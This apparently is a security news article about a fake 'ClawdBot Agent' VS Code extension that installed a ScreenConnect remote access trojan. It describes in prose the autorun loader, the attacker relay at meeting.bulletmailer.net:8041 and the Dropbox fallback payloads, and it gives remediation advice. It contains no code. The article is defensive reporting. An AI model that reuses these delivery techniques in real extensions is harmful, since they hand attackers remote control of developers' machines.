A dangerous and weaponized VS Code extension, disguised as a legitimate AI coding assistant, was recently discovered to be distributing the ScreenConnect Remote Access Trojan (RAT). Security researchers flagged the malicious extension, identified as a fake “ClawdBot Agent,” on January 27, 2026. This imposter successfully exploited the popularity and trust developers place in their integrated development environments (IDEs) to distribute malware, posing a significant threat to the developer community.
The fake ClawdBot Agent extension was designed to mimic the functionality of legitimate AI-powered tools, even integrating with well-known providers like OpenAI, Anthropic, and Google. This deceptive approach allowed it to bypass initial scrutiny and gain the trust of users. Upon installation, the extension silently initiated its malicious payload, deploying malware onto Windows systems without any user interaction or awareness. Following Microsoft’s notification, the extension was promptly removed from its marketplace.
Infection Mechanism and ScreenConnect Deployment
Aikido security analysts delved into the mechanics of this threat, uncovering a sophisticated infection chain. The extension contained code that executed automatically every time Visual Studio Code was launched. This initial JavaScript code was programmed to establish a connection with an external server, fetching configuration instructions. These instructions then facilitated the download and execution of multiple malicious files, skillfully camouflaged as legitimate system components.
The most alarming aspect of this attack involved the weaponization of legitimate remote access software. Once the initial dropper was executed, it deployed ScreenConnect, a widely recognized IT support tool. However, in this malicious context, ScreenConnect was configured to communicate with attacker-controlled servers located at meeting.bulletmailer.net on port 8041. The threat actors had established their own ScreenConnect relay server and pre-packaged client installers, which were then distributed via the fraudulent VS Code extension. Consequently, unsuspecting victims unknowingly installed a fully functional ScreenConnect client, which immediately established remote connections to the attackers’ infrastructure.
Further bolstering its resilience, the attack included a Rust-based DLL file that provided a redundant delivery mechanism. This module was designed to fetch backup payloads from Dropbox, masquerading as a Zoom update. This multi-layered approach ensured that the attackers could maintain access and continue their operations even if their primary command-and-control servers were disabled. The deployment of three distinct fallback mechanisms highlights the advanced operational planning and determination of the threat actors behind this weaponized VS Code extension.
Users who may have installed this malicious extension are strongly advised to uninstall it immediately. Additionally, it is crucial to remove any instances of ScreenConnect from their systems and to block the identified infrastructure domains in their network. Rotating API keys for any AI services that were accessed through the compromised extension is also a critical security measure. This incident serves as a powerful reminder of the paramount importance of rigorously verifying the authenticity and reputation of any extension before proceeding with its installation.
The ongoing evolution of threats targeting developer tools underscores the need for continuous vigilance and robust security practices within the software development lifecycle. As attackers become more sophisticated in their deception tactics, security researchers anticipate further attempts to leverage trusted platforms for malicious purposes. Developers and organizations should remain informed about emerging threats and implement comprehensive security strategies to mitigate these risks effectively.